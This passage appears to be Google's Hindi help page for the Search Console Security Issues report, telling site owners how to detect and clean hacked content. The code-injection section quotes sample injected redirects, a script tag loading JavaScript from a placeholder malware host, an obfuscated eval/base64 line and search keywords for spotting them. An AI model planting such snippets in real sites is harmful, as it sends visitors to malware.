अगर Google की समीक्षा से पता चलता है कि आपकी साइट हैक की गई थी या आपकी साइट की किसी गतिविधि से, वेबसाइट पर आने वालों या उनके कंप्यूटर को नुकसान पहुंच सकता है, तो सुरक्षा से जुड़ी समस्याओं वाली रिपोर्ट में इसकी जानकारी मिलेगी. नुकसान पहुंचाने वाली गतिविधियों के उदाहरण में, फ़िशिंग हमले या साइट का इस्तेमाल करने वाले लोगों के कंप्यूटर पर मैलवेयर या अनचाहे साॅफ़्टवेयर इंस्टाॅल करना शामिल है.
जिन पेजों या साइटों में सुरक्षा से जुड़ी समस्या है वे खोज नतीजों में चेतावनी वाले लेबल के साथ दिख सकती हैं. या फिर, इन्हें ऐक्सेस करने की कोशिश करते समय, पेज के खुलने से पहले ही उपयोगकर्ता को ब्राउज़र में चेतावनी वाला पेज दिख सकता है.
सुरक्षा से जुड़ी समस्याओं वाली रिपोर्ट खोलें
Security issues report in Search Console - Google Search Console Training
सुरक्षा से जुड़ी समस्याएं क्या होती हैं?
सुरक्षा से जुड़ी समस्याओं को इन कैटगरी में बांटा जा सकता है:
- हैक किया गया कॉन्टेंट: यह ऐसा कोई भी कॉन्टेंट होता है जो आपकी मंज़ूरी के बगैर, आपकी साइट पर डाल दिया जाता है. ऐसा आपकी साइट में सुरक्षा की कमियों की वजह से होता है. हमारे उपयोगकर्ताओं की सुरक्षा के लिए, Google पूरी कोशिश करता है कि खोज नतीजों में हैक किया गया कॉन्टेंट न दिखे. ज़्यादा जानें.
- मैलवेयर और अनचाहा सॉफ़्टवेयर: यह सॉफ़्टवेयर लोगों या उनके डिवाइस को नुकसान पहुंचाने के लिए बनाया जाता है. ऐसे सॉफ़्टवेयर से लोगों के साथ धोखाधड़ी की जाती है या उनके डिवाइस पर ऐसी गतिविधियां की जाती हैं जिनके बारे में उन्हें पता नहीं होता. इसके अलावा, इसकी वजह से लोगों को डिवाइस इस्तेमाल करने में परेशानी भी हो सकती है. मैलवेयर को हैकर या साइट का मालिक इंस्टॉल कर सकता है. ज़्यादा जानें.
- साेशल इंजीनियरिंग: यह ऐसा कॉन्टेंट होता है जिसका इस्तेमाल करके, साइट पर आने वाले लाेगाें काे गुमराह किया जाता है. साथ ही, ऐसी गतिविधियां कराने की कोशिश की जाती है जिनसे उन्हें खतरा हो सकता है. इन गतिविधियों में गाेपनीय जानकारी शेयर करना या सॉफ़्टवेयर डाउनलाेड करना शामिल है. ज़्यादा जानें.
क्या मेरी साइट में सुरक्षा से जुड़ी समस्याएं हैं?
अगर आपकी साइट में सुरक्षा से जुड़ी समस्याएं हैं, तो आपको रिपोर्ट के सबसे ऊपरी हिस्से में साइट में इनकी कुल संख्या दिखेगी.
अगर आपकी साइट में सुरक्षा से जुड़ी समस्याएं नहीं हैं, तो आपको हरे रंग का सही का निशान और इस बारे में एक मैसेज दिखेगा.
मैंने यह साइट अभी खरीदी है!
अगर आपने हाल ही में कोई ऐसी साइट खरीदी है जिसमें पहले से ही सुरक्षा से जुड़ी समस्याएं थीं, तो सुरक्षा से जुड़ी समस्याओं की रिपोर्ट में बताई गई सभी समस्याओं को ठीक करें. इसके बाद, साइट को खोज के नतीजों में फिर से शामिल करने का अनुरोध करें. साथ ही, हमें यह जानकारी भी दें कि आपने यह साइट हाल ही में खरीदी है और अब यह साइट Google Web Search की स्पैम से जुड़ी नीतियों का पालन करती है.
मुझे चेतावनियां नहीं दिख रही हैं
Google SafeBrowsing की सुविधा उपयोगकर्ताओं को साइट ब्राउज़ करने के उनके तरीकों के हिसाब से चेतावनियां दिखाती है. इसलिए, आपको चेतावनियां शायद दिखें या शायद न भी दिखें. हालांकि, अपनी साइट में सुरक्षा से जुड़ी समस्याओं का पता लगाने या यह पुष्टि करने के लिए कि समस्याओं को ठीक किया गया है या नहीं, आपको सुरक्षा से जुड़ी समस्याओं की रिपोर्ट पर भरोसा करना चाहिए.
किन पेजों में सुरक्षा से जुड़ी समस्याएं हैं?
सुरक्षा की समस्याओं वाले यूआरएल के उदाहरणों की सूची देखने के लिए, किसी समस्या की जानकारी वाला सेक्शन बड़ा करके देखें. ज़रूरी नहीं है कि इस सूची में समस्या वाले सभी पेज शामिल हों. इसमें आपकी साइट के ऐसे कुछ पेज दिखेंगे जिन पर चुनी गई समस्या मौजूद है. कभी-कभी ऐसा भी हो सकता है कि आपको रिपोर्ट में सुरक्षा से जुड़ी समस्या दिखे, लेकिन इनके उदाहरण के तौर पर एक भी यूआरएल मौजूद न हो. इसका मतलब यह नहीं है कि आपके किसी भी पेज में कोई समस्या नहीं है. ऐसा सिर्फ़ इसलिए होता है, क्योंकि कुछ वजहों से हम उदाहरण वाले यूआरएल नहीं जुटा पाते.
समस्या की जानकारी में, आपकी साइट पर पहली बार समस्या के बारे में पता चलने की तारीख दी गई होती है. साथ ही, समस्या के बारे में ज़्यादा जानने के लिए एक लिंक और कम शब्दों में समस्या की जानकारी दी होती है.
समस्या ठीक करना
अपनी साइट में सुरक्षा से जुड़ी समस्या ठीक करने के लिए:
- सुरक्षा की समस्याओं वाली रिपोर्ट में समस्या की जानकारी वाला सेक्शन बड़ा करके देखें.
- समस्या की जानकारी पढ़ें. साथ ही, समस्या के बारे में ज़्यादा जानकारी पाने और उसे ठीक करने का तरीका जानने के लिए, "ज़्यादा जानें" लिंक पर क्लिक करें. ("ज़्यादा जानें" लिंक आपको इस पेज पर नीचे दी गई जानकारी तक ले जाएगा.)
- सुरक्षा से जुड़ी समस्या को ठीक करने के लिए, जानकारी वाले सेक्शन में दिए गए पेजों का इस्तेमाल करें. ये पेज उदाहरण के तौर पर दिए गए हैं. ज़रूरी नहीं है कि इस सूची में समस्या वाले सभी पेज शामिल हों. इसमें आपकी साइट के ऐसे कुछ पेज होते हैं जिनमें यह समस्या मौजूद है. शायद आपको रिपोर्ट में सुरक्षा की ऐसी समस्या दिखे जिसके लिए उदाहरण के तौर पर एक भी यूआरएल मौजूद न हो. इसका मतलब यह नहीं है कि आपके किसी भी पेज में कोई समस्या नहीं है. ऐसा सिर्फ़ इसलिए होता है, क्योंकि किसी वजह से हम उदाहरण जुटा नहीं पाते.
- समस्या को पूरी साइट पर ठीक करें. सिर्फ़ कुछ ही पेजों पर समस्या को ठीक करने से आपके सभी पेज, खोज के नतीजों में दिखना शुरू नहीं होंगे.
- अगर रिपोर्ट में बताया गया है कि आपकी साइट में सुरक्षा से जुड़ी एक से ज़्यादा समस्याएं हैं, तो उन सभी समस्याओं को ठीक करें.
- समस्याओं को ठीक करने के बाद, उनकी जांच करें.
- रिपोर्ट में बताई गई सभी समस्याओं को सभी पेजों पर ठीक करने के बाद, सुरक्षा से जुड़ी समस्याओं वाली रिपोर्ट में समीक्षा के लिए अनुरोध करें विकल्प को चुनें. साइट को फिर से शामिल करने के अनुरोध में, ठीक की गई गड़बड़ियों की जानकारी दें. ठीक तरह से किए गए अनुरोध में तीन चीज़ें शामिल होती हैं:
- साइट की क्वालिटी से जुड़ी समस्या के बारे में सटीक जानकारी.
- समस्या को ठीक करने के लिए उठाए गए कदमों की जानकारी.
- आपकी हर कोशिश के नतीजों की जानकारी देने वाले दस्तावेज़.
- साइट को फिर से शामिल करने के लिए, उसकी समीक्षा करने में कुछ समय लग सकता है (नीचे देखें). आपको ईमेल से यह सूचना दी जाएगी कि आपकी साइट की समीक्षा पर कितना काम हुआ है. अनुरोध किए जाने पर आपको समीक्षा की पुष्टि वाला एक मैसेज मिलेगा, ताकि आपको यह पता चल जाए कि आपकी साइट की समीक्षा की जा रही है. जब तक आपको पिछले अनुरोध पर कोई आखिरी फ़ैसला नहीं मिल जाता, तब तक फिर से समीक्षा करने का अनुरोध न करें.
साइट को फिर से शामिल करने के लिए, उसकी समीक्षा करने में कितना समय लगेगा?
ज़्यादातर साइटों को फिर से शामिल करने के लिए, उनकी समीक्षा करने में कुछ दिन या कुछ हफ़्ते लग सकते हैं. हालांकि, कुछ मामलों में इसके लिए सामान्य से ज़्यादा समय लग सकता है. इनमें ऐसे मामले शामिल हैं जिनमें लिंक से जुड़ी समस्या की वजह से हटाई गई साइट को फिर से शामिल करने का अनुरोध किया गया है. साइट की समीक्षा करने का अनुरोध मिलने के बाद, हम आपको ईमेल पर इसकी सूचना देंगे, ताकि आपको पता चल जाए कि आपके अनुरोध पर कार्रवाई की जा रही है. समीक्षा पूरी होने पर भी आपको इस बारे में ईमेल से जानकारी भेजी जाएगी.
जब तक आपको पिछले अनुरोध पर कोई आखिरी फ़ैसला नहीं मिल जाता, तब तक फिर से अनुरोध न करें. अगर साइट की समस्याओं को ठीक किए बिना ही साइट को फिर से शामिल करने का अनुरोध किया जाता है, तो आपके अगले अनुरोध का जवाब मिलने में ज़्यादा समय लग सकता है. इसके अलावा, आपकी पहचान बार-बार उल्लंघन करने वाले के तौर पर की जा सकती है.
सुरक्षा से जुड़ी समस्याओं की सूची
यहां पर साइट में हुई सुरक्षा से जुड़ी समस्याओं की सूची दी गई है. साथ ही, हर समस्या को ठीक करने का तरीका बताया गया है. समस्याओं को या तो गड़बड़ियों 
या चेतावनियों 
की कैटगरी में रखा गया है.
सुरक्षा से जुड़ी समस्याओं की जानकारी - Google Search Console की ट्रेनिंग
हैक किया गया: मैलवेयर
1. समस्या का पता लगाएं
Chrome ब्राउज़र में, समस्या के उदाहरण वाले कुछ यूआरएल देखें. शायद आपको ब्राउज़र के नेविगेशन बार में खतरनाक चेतावनी और चेतावनी वाला कुछ ऐसा अचानक दिखने वाला पेज दिखे:
2. देखें कि क्या इस समस्या को ठीक किया जा सकता है
अपनी साइट पर मैलवेयर की समस्या को ठीक करने के लिए, उस पर मौजूद कोड को पढ़ना और समझना ज़रूरी है. साथ ही, साइट के वेब सर्वर के कॉन्फ़िगरेशन की जानकारी होनी चाहिए. अगर आपको लगता है कि इस समस्या को हल नहीं किया जा सकता, तो मदद पाने के लिए सहायता टीम बनाएं लेख पढ़ें.
3. अपनी साइट पर मैलवेयर की समस्या का पता लगाएं और उसे ठीक करें
मैलवेयर किस तरह का है इसका पता लगाने और समस्या ठीक करने के लिए, web.dev पर हैक करने के बारे में गाइड का मैलवेयर की समस्या ठीक करने से जुड़ा सेक्शन पढ़ें. ध्यान दें कि आपकी साइट में एक से ज़्यादा तरह के मैलवेयर हो सकते हैं. इसलिए, अपनी साइट की अच्छी तरह से जांच करें और मैलवेयर को हटाएं. पक्का करें कि सुरक्षा की समस्याओं से जुड़ी रिपोर्ट में, उदाहरण के तौर पर दिखाए यूआरएल में समस्या मौजूद है.
4. समीक्षा का अनुरोध करें
पहले यह पुष्टि कर लें कि आपकी साइट में सुरक्षा की समस्या को ठीक कर लिया गया है. इसके बाद, सुरक्षा की समस्याओं वाली रिपोर्ट में, सुरक्षा की समीक्षा के लिए अनुरोध करें. साइट की समीक्षा करने में कुछ दिनों से लेकर कुछ हफ़्ते लग सकते हैं.
5. अपनी साइट को सुरक्षित रखने के लिए, सबसे सही तरीके अपनाएं
अपनी साइट को हैक होने से बचाने के तरीकों और उसकी सुरक्षा पर निगरानी रखने के बारे में ये दिशा-निर्देश पढ़ें.
हैक किया गया: कोड इंजेक्शन
हैकर ने आपकी साइट से छेड़छाड़ की है. हैकर आपकी साइट के पेजों में नुकसान पहुंचाने वाले कोड डाल रहा है. इसके उदाहरणों में नुकसान पहुंचाने वाली साइट पर रीडायरेक्ट करना या पेज खुले रहने के दौरान आपके ब्राउज़र पर क्रिप्टो करंसी की माइनिंग करने वाला सॉफ़्टवेयर चलाना भी शामिल है.
1. देखें कि क्या इस समस्या को ठीक किया जा सकता है
इस समस्या को खुद ठीक करने या इसके लिए मदद पाने का तरीका जानने के लिए, सहायता टीम बनाएं लेख पढ़ें.
2. समस्या का पता लगाएं
पक्का करें कि इस चेतावनी के लिए, उदाहरण के तौर पर दिए गए किसी यूआरएल में यह समस्या मौजूद हो.
अपनी साइट के उन पेजों को ब्राउज़र से सीधे न देखें, जिन पर मैलवेयर का असर हुआ है.
मैलवेयर अक्सर ब्राउज़र की कमियों की वजह से फैलते हैं. इसलिए, आपका कंप्यूटर ऐसे पेजों को ब्राउज़र पर खोलने से खराब हो सकता है, जिन पर मैलवेयर का असर हुआ हो. इसके अलावा, हैकर क्लोकिंग तकनीक का इस्तेमाल करके स्पैम वाली सामग्री को छिपा सकते हैं, ताकि साइट के मालिक उसे देख न पाएं.
अपने कंप्यूटर पर सामग्री को ज़्यादा सुरक्षित रूप से देखने के लिए, यहां दो वैकल्पिक तरीके बताए गए हैं:
- Google को आपका पेज जैसा दिखाई देता है, उसे वैसा ही देखने के लिए, यूआरएल की जाँच करने वाला टूल इस्तेमाल करें. यह इसलिए कारगर है क्योंकि कई हैकर पेज में जिस तरह के बदलाव करते हैं, वे सिर्फ़ Google की मशीनों को दिखाई देते हैं. उदाहरण के लिए, वे आपकी साइट के पेजों पर उनकी साइट तक ले जाने वाला लिंक डाल सकते हैं. ये लिंक सिर्फ़ तब दिखाई देंगे, जब पेज को Google के तौर पर देखा जाएगा.
- एचटीटीपी अनुरोध (जैसे पेज को फ़ेच करना) करने के लिए कमांड लाइन से cURL या Wget का इस्तेमाल करें. ये टूल मुफ़्त में इस्तेमाल किए जा सकते हैं. इनसे दूसरे वेबपेज पर भेजने वाले लिंक आसानी से पहचाने जा सकते हैं. इन टूल की मदद से ब्राउज़र या रेफ़रल देने वाले के बारे में जानकारी भी ली जा सकती है. आम तौर पर हैकर सिर्फ़ खास ब्राउज़र और रेफ़रर के साथ ही छेड़छाड़ करते हैं. इससे उनका पता नहीं चल पाता और वे ऐसे उपयोगकर्ताओं को चुन पाते हैं, जो धोखे से उनकी साइट पर आ जाएं. इन टूल का इस्तेमाल करके आप अपनी साइट को उपयोगकर्ताओं की तरह देख सकते हैं. अगर आपका अनुरोध स्पैम वाला नहीं है, तो ऐसी दूसरी वेबसाइट (बड़ी वेबसाइट या दूसरे सर्च इंजन के लिंक) देने की कोशिश करें, जिन पर आपकी साइट का लिंक हो. उदाहरण के लिए, किसी Windows मशीन पर
www.example.com/page.htmlको 'Google सर्च' नतीजों से इस पर आए उपयोगकर्ता की तरह देखने के लिए, इस तरह के यूआरएल का इस्तेमाल करें:
$curl -v --referer "https://www.google.com" --user-agent "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; FSL 7.0.7.01001)" http://www.example.com/page.html
हैकर ने नुकसान पहुंचाने वाला कोड सीधे आपकी साइट के एचटीएमएल वाली फ़ाइलों में डाला होगा (उदाहरण के लिए, JavaScript से रीडायरेक्ट करने वाले कोड जोड़ना). इसके अलावा, हैकर आपकी साइट का कॉन्टेंट जनरेट करने वाली फ़ाइलों में भी यह कोड डाल सकता है (उदाहरण के लिए, PHP फ़ाइलें).
सुरक्षा की समस्याओं वाली रिपोर्ट में शामिल उस पेज को फ़ेच करें जिस पर मैलवेयर के हमले से नुकसान हुआ है और मिलने वाले जवाब की जांच करें. हैकर आपकी साइट पर आने वाले उपयोगकर्ताओं को अपनी साइट पर रीडायरेक्ट करने के लिए कई तरीकों का इस्तेमाल कर सकते हैं. यहां ऐसे ही कुछ तरीके दिए गए हैं:
- रीडायरेक्ट करना:
- हेडर की मदद से रीडायरेक्ट करना: हैकर आपकी साइट के सर्वर के कॉन्फ़िगरेशन वाली फ़ाइल (फ़ाइलों) में बदलाव करके, आपकी साइट पर आने वाले उपयोगकर्ताओं को रीडायरेक्ट कर सकते हैं. आम तौर पर, सर्वर की कॉन्फ़िगरेशन वाली फ़ाइलें इस्तेमाल करके, साइट का एडमिन यह तय कर सकता है कि यूआरएल रीडायरेक्ट उपयोगकर्ता को वेबसाइट के किन खास पेजों या डायरेक्ट्री पर ले जाए. उदाहरण के लिए, Apache सर्वर पर .htaccess फ़ाइल और httpd.conf, दोनों ही सर्वर के कॉन्फ़िगरेशन वाली फ़ाइलें हैं.
... < HTTP/1.1 301 Moved Permanently < Date: Sun, 24 Feb 2013 21:06:45 GMT < Server: Apache < Location: http://<malware-site>/index.html < Content-Length: 253 - JavaScript की मदद से रीडायरेक्ट करना:
<script> if (document.referrer.match(/google\.com/)) { window.location("http://<malware-site>/");} <script>
- हेडर की मदद से रीडायरेक्ट करना: हैकर आपकी साइट के सर्वर के कॉन्फ़िगरेशन वाली फ़ाइल (फ़ाइलों) में बदलाव करके, आपकी साइट पर आने वाले उपयोगकर्ताओं को रीडायरेक्ट कर सकते हैं. आम तौर पर, सर्वर की कॉन्फ़िगरेशन वाली फ़ाइलें इस्तेमाल करके, साइट का एडमिन यह तय कर सकता है कि यूआरएल रीडायरेक्ट उपयोगकर्ता को वेबसाइट के किन खास पेजों या डायरेक्ट्री पर ले जाए. उदाहरण के लिए, Apache सर्वर पर .htaccess फ़ाइल और httpd.conf, दोनों ही सर्वर के कॉन्फ़िगरेशन वाली फ़ाइलें हैं.
- नुकसान पहुंचाने वाली ऐसी JavaScript जो किसी दूसरी साइट से लोड की गई है:
<script type='text/javascript' src='http://<malware-site>/js/x55.js'></script> - नुकसान पहुंचाने वाले ऐसे कोड जिन्हें बदल दिया गया है, ताकि उनका पता नहीं लगाया जा सके:
eval(base64_decode("d2luZG93LmxvY2F0aW9uPScvL2dvb2dsZS5jb20nOw=="));
अपनी साइट पर या फिर सर्वर पर कोई भी अनुरोध करने पर मिलने वाले जवाबों में संदिग्ध कोड ढूंढें. "search", "eval", "base64_decode", और "unescape" जैसे शब्दों को खोजने से मदद मिल सकती है.
3. अपनी साइट से मैलवेयर हटाएं
अपनी साइट से मैलवेयर हटाने के लिए, मैलवेयर वाली फ़ाइलों को हटाया जा सकता है. साथ ही, बैकअप के तौर पर पहले सेव की गई, बिना मैलवेयर वाली फ़ाइलें उनकी जगह इस्तेमाल की जा सकती हैं. इसके अलावा, मौजूदा फ़ाइलों से स्पैम वाला कॉन्टेंट हटाया जा सकता है.
इसके अलावा:
- अपनी साइट को पूरी तरह से सुरक्षित बनाने के लिए, हैक किए गए कॉन्टेंट को ठीक करने का तरीका बताने वाली गाइड पढ़ें. इसमें आपकी साइट से मैलवेयर हटाने के तरीके और उसे दोबारा हैक होने से बचाने की सलाह दी गई हैं.
4. समीक्षा का अनुरोध करें
पहले यह पुष्टि कर लें कि आपकी साइट में सुरक्षा की समस्या को ठीक कर लिया गया है. इसके बाद, सुरक्षा की समस्याओं वाली रिपोर्ट में, सुरक्षा की समीक्षा के लिए अनुरोध करें. साइट की समीक्षा करने में कुछ दिनों से लेकर कुछ हफ़्ते लग सकते हैं.
हैक कर लिया गया: कॉन्टेंट इंजेक्शन
हैकर आपकी साइट के पेजों में स्पैम वाले लिंक या टेक्स्ट डाल सकते हैं. हैक करने के लिए इस्तेमाल किए जाने वाले कॉन्टेंट में दवाओं के नाम या स्पैम वाले ऐसा दूसरा कॉन्टेंट शामिल हो सकता है जो साइट के कॉन्टेंट से अलग हो.
आम तौर पर, हैकर इनमें से किसी एक तरीके से आपकी साइट में बदलाव करते हैं:
- आपके सर्वर पर किसी असुरक्षित डायरेक्ट्री का ऐक्सेस पाकर. उदाहरण के लिए, हो सकता है कि आपने अनजाने में किसी डायरेक्ट्री की सेटिंग इस तरह कर दी हों कि उसे कोई भी व्यक्ति देख सकता है.
- आपकी साइट पर चल रहे कॉन्टेंट मैनेजमेंट सिस्टम जैसे सॉफ़्टवेयर की कमियों का फ़ायदा उठाकर. उदाहरण के लिए, हो सकता है कि आप Drupal, Joomla या WordPress के किसी पुराने और असुरक्षित वर्शन का इस्तेमाल कर रहे हों.
- तीसरे पक्ष के किसी ऐसे प्लग इन को हैक करके जिसे आप अपनी साइट पर इस्तेमाल करते हैं. उदाहरण के लिए, विज़िटर काउंटर.
1. देखें कि क्या इस समस्या को ठीक किया जा सकता है
इस समस्या को खुद ठीक करने या इसके लिए मदद पाने का तरीका जानने के लिए, सहायता टीम बनाएं लेख पढ़ें.
2. समस्या का पता लगाएं
पक्का करें कि इस चेतावनी के लिए, उदाहरण के तौर पर दिए गए किसी यूआरएल में यह समस्या मौजूद हो.
अपनी साइट के उन पेजों को ब्राउज़र से सीधे न देखें, जिन पर मैलवेयर का असर हुआ है.
मैलवेयर अक्सर ब्राउज़र की कमियों की वजह से फैलते हैं. इसलिए, आपका कंप्यूटर ऐसे पेजों को ब्राउज़र पर खोलने से खराब हो सकता है, जिन पर मैलवेयर का असर हुआ हो. इसके अलावा, हैकर क्लोकिंग तकनीक का इस्तेमाल करके स्पैम वाली सामग्री को छिपा सकते हैं, ताकि साइट के मालिक उसे देख न पाएं.
अपने कंप्यूटर पर सामग्री को ज़्यादा सुरक्षित रूप से देखने के लिए, यहां दो वैकल्पिक तरीके बताए गए हैं:
- Google को आपका पेज जैसा दिखाई देता है, उसे वैसा ही देखने के लिए, यूआरएल की जाँच करने वाला टूल इस्तेमाल करें. यह इसलिए कारगर है क्योंकि कई हैकर पेज में जिस तरह के बदलाव करते हैं, वे सिर्फ़ Google की मशीनों को दिखाई देते हैं. उदाहरण के लिए, वे आपकी साइट के पेजों पर उनकी साइट तक ले जाने वाला लिंक डाल सकते हैं. ये लिंक सिर्फ़ तब दिखाई देंगे, जब पेज को Google के तौर पर देखा जाएगा.
- एचटीटीपी अनुरोध (जैसे पेज को फ़ेच करना) करने के लिए कमांड लाइन से cURL या Wget का इस्तेमाल करें. ये टूल मुफ़्त में इस्तेमाल किए जा सकते हैं. इनसे दूसरे वेबपेज पर भेजने वाले लिंक आसानी से पहचाने जा सकते हैं. इन टूल की मदद से ब्राउज़र या रेफ़रल देने वाले के बारे में जानकारी भी ली जा सकती है. आम तौर पर हैकर सिर्फ़ खास ब्राउज़र और रेफ़रर के साथ ही छेड़छाड़ करते हैं. इससे उनका पता नहीं चल पाता और वे ऐसे उपयोगकर्ताओं को चुन पाते हैं, जो धोखे से उनकी साइट पर आ जाएं. इन टूल का इस्तेमाल करके आप अपनी साइट को उपयोगकर्ताओं की तरह देख सकते हैं. अगर आपका अनुरोध स्पैम वाला नहीं है, तो ऐसी दूसरी वेबसाइट (बड़ी वेबसाइट या दूसरे सर्च इंजन के लिंक) देने की कोशिश करें, जिन पर आपकी साइट का लिंक हो. उदाहरण के लिए, किसी Windows मशीन पर
www.example.com/page.htmlको 'Google सर्च' नतीजों से इस पर आए उपयोगकर्ता की तरह देखने के लिए, इस तरह के यूआरएल का इस्तेमाल करें:
$curl -v --referer "https://www.google.com" --user-agent "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; FSL 7.0.7.01001)" http://www.example.com/page.html
अपनी साइट के कुछ पेज फ़ेच करें और ऐसे संदिग्ध कॉन्टेंट या लिंक की जांच करें जिन्हें आपने नहीं जोड़ा है. उदाहरण के लिए, दवाओं के नाम या स्पैम वाले शब्द जैसे कि "viagra" या "earn money" खोजें.
3. अपनी साइट से मैलवेयर हटाएं
अपनी साइट से मैलवेयर हटाने के लिए, मैलवेयर वाली फ़ाइलों को हटाया जा सकता है. साथ ही, बैकअप के तौर पर पहले सेव की गई, बिना मैलवेयर वाली फ़ाइलें उनकी जगह इस्तेमाल की जा सकती हैं या हर पेज से स्पैम कॉन्टेंट और लिंक हटाए जा सकते हैं. अच्छी तरह जांच लें कि सुरक्षा की समस्याओं वाली रिपोर्ट में दिए गए हैकिंग के सभी उदाहरणों को ठीक कर लिया गया हो. इसके अलावा, Google पर “site:” खोज के तरीके का इस्तेमाल करें. इससे, आप अपनी वेबसाइट पर सोर्स फ़ाइल खोजकर, यह पता लगा सकते हैं कि आपकी साइट के किन पेजों को हैक किया गया है.
इसके अलावा:
- अपनी साइट को पूरी तरह से सुरक्षित बनाने के लिए, हैक किए गए कॉन्टेंट को ठीक करने का तरीका बताने वाली गाइड पढ़ें. इसमें आपकी साइट से मैलवेयर हटाने के तरीके और उसे दोबारा हैक होने से बचाने की सलाह दी गई हैं.
4. समीक्षा का अनुरोध करें
पहले यह पुष्टि कर लें कि आपकी साइट में सुरक्षा की समस्या को ठीक कर लिया गया है. इसके बाद, सुरक्षा की समस्याओं वाली रिपोर्ट में, सुरक्षा की समीक्षा के लिए अनुरोध करें. साइट की समीक्षा करने में कुछ दिनों से लेकर कुछ हफ़्ते लग सकते हैं.
हैक किया गया: यूआरएल इंजेक्शन
हैकर अक्सर आपकी साइट पर ऐसे नए पेज जोड़ता है जिनमें स्पैम वाले शब्द या लिंक होते हैं. कभी-कभी इन नए पेजों पर ऐसा कोड होता है जिससे आपकी साइट पर गलत असर पड़ता है. उदाहरण के लिए, आपके उपयोगकर्ताओं को दूसरी साइटों पर ले जाना या दूसरी साइटों के ख़िलाफ़ सेवा में रुकावट के हमले में आपके वेबसर्वर को शामिल करना.
1. देखें कि क्या इस समस्या को ठीक किया जा सकता है
इस समस्या को खुद ठीक करने या इसके लिए मदद पाने का तरीका जानने के लिए, सहायता टीम बनाएं लेख पढ़ें.
2. समस्या का पता लगाएं
पक्का करें कि इस चेतावनी के लिए, उदाहरण के तौर पर दिए गए किसी यूआरएल में यह समस्या मौजूद हो.
अपनी साइट के उन पेजों को ब्राउज़र से सीधे न देखें, जिन पर मैलवेयर का असर हुआ है.
मैलवेयर अक्सर ब्राउज़र की कमियों की वजह से फैलते हैं. इसलिए, आपका कंप्यूटर ऐसे पेजों को ब्राउज़र पर खोलने से खराब हो सकता है, जिन पर मैलवेयर का असर हुआ हो. इसके अलावा, हैकर क्लोकिंग तकनीक का इस्तेमाल करके स्पैम वाली सामग्री को छिपा सकते हैं, ताकि साइट के मालिक उसे देख न पाएं.
अपने कंप्यूटर पर सामग्री को ज़्यादा सुरक्षित रूप से देखने के लिए, यहां दो वैकल्पिक तरीके बताए गए हैं:
- Google को आपका पेज जैसा दिखाई देता है, उसे वैसा ही देखने के लिए, यूआरएल की जाँच करने वाला टूल इस्तेमाल करें. यह इसलिए कारगर है क्योंकि कई हैकर पेज में जिस तरह के बदलाव करते हैं, वे सिर्फ़ Google की मशीनों को दिखाई देते हैं. उदाहरण के लिए, वे आपकी साइट के पेजों पर उनकी साइट तक ले जाने वाला लिंक डाल सकते हैं. ये लिंक सिर्फ़ तब दिखाई देंगे, जब पेज को Google के तौर पर देखा जाएगा.
- एचटीटीपी अनुरोध (जैसे पेज को फ़ेच करना) करने के लिए कमांड लाइन से cURL या Wget का इस्तेमाल करें. ये टूल मुफ़्त में इस्तेमाल किए जा सकते हैं. इनसे दूसरे वेबपेज पर भेजने वाले लिंक आसानी से पहचाने जा सकते हैं. इन टूल की मदद से ब्राउज़र या रेफ़रल देने वाले के बारे में जानकारी भी ली जा सकती है. आम तौर पर हैकर सिर्फ़ खास ब्राउज़र और रेफ़रर के साथ ही छेड़छाड़ करते हैं. इससे उनका पता नहीं चल पाता और वे ऐसे उपयोगकर्ताओं को चुन पाते हैं, जो धोखे से उनकी साइट पर आ जाएं. इन टूल का इस्तेमाल करके आप अपनी साइट को उपयोगकर्ताओं की तरह देख सकते हैं. अगर आपका अनुरोध स्पैम वाला नहीं है, तो ऐसी दूसरी वेबसाइट (बड़ी वेबसाइट या दूसरे सर्च इंजन के लिंक) देने की कोशिश करें, जिन पर आपकी साइट का लिंक हो. उदाहरण के लिए, किसी Windows मशीन पर
www.example.com/page.htmlको 'Google सर्च' नतीजों से इस पर आए उपयोगकर्ता की तरह देखने के लिए, इस तरह के यूआरएल का इस्तेमाल करें:
$curl -v --referer "https://www.google.com" --user-agent "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; FSL 7.0.7.01001)" http://www.example.com/page.html
यह देखने के लिए कि आपका बनाया गया कोई पेज Google पर मौजूद है या नहीं, रिपोर्ट में उदाहरण के तौर पर दिए गए यूआरएल को खोजकर देखें. अगर आपने ये पेज नहीं बनाए हैं, तो आपको अपनी साइट से इन पेजों को हटाना होगा या फिर अपने-आप पेज जनरेट करने वाले कोड को हटाना होगा. अपनी साइट पर इन पेजों को ढूंढने और हटाने का तरीका जानने के लिए यह लेख पढ़ें.
आप “site:” खोज सुविधा का इस्तेमाल करके भी ऐसे पेज खोज सकते हैं जिन्हें आपने नहीं बनाया है.
- किसी छोटी साइट पर, आप Google Search में [site:example.com] खोजकर ऐसे पेजों की सूची देख सकते हैं जिन्हें हमने इंडेक्स किया है. ध्यान दें कि उसमें कोई ऐसा पेज मौजूद न हो जो आपने नहीं बनाया है.
- बड़ी साइटों के लिए, आप ज़्यादा खास तरह की क्वेरी इस्तेमाल कर सकते हैं. उदाहरण के लिए, यहां देखें:
- [site:example.com pharmacy] - example.com पर "pharmacy" शब्द वाले सभी पेजों की सूची बनाएं. इसकी जगह दूसरे सामान्य स्पैम वाले शब्दों को खोजकर देखें.
- [site:example.com/wp-admin/] - अपनी WordPress साइट के एडमिन सेक्शन में सभी पेजों की सूची बनाएं.
3. अपनी साइट से मैलवेयर हटाएं
अपनी साइट से मैलवेयर वाले लिंक या शब्दों को हटाने के लिए, मैलवेयर वाली डायरेक्ट्री को हटाया जा सकता है. साथ ही, उनकी जगह बिना मैलवेयर वाली वे डायरेक्ट्री इस्तेमाल की जा सकती हैं जो आपने बैकअप के तौर पर पहले सेव की थीं. इसके अलावा, ऐसे अनचाहे पेजों और फ़ाइलों या फ़ंक्शन को हटाया जा सकता है जिनका इस्तेमाल करके हैकर ने डायरेक्ट्री बनाई थी.
इसके अलावा:
- अपनी साइट को पूरी तरह से सुरक्षित बनाने के लिए, हैक किए गए कॉन्टेंट को ठीक करने का तरीका बताने वाली गाइड पढ़ें. इसमें आपकी साइट से मैलवेयर हटाने के तरीके और उसे दोबारा हैक होने से बचाने की सलाह दी गई हैं.
4. समीक्षा का अनुरोध करें
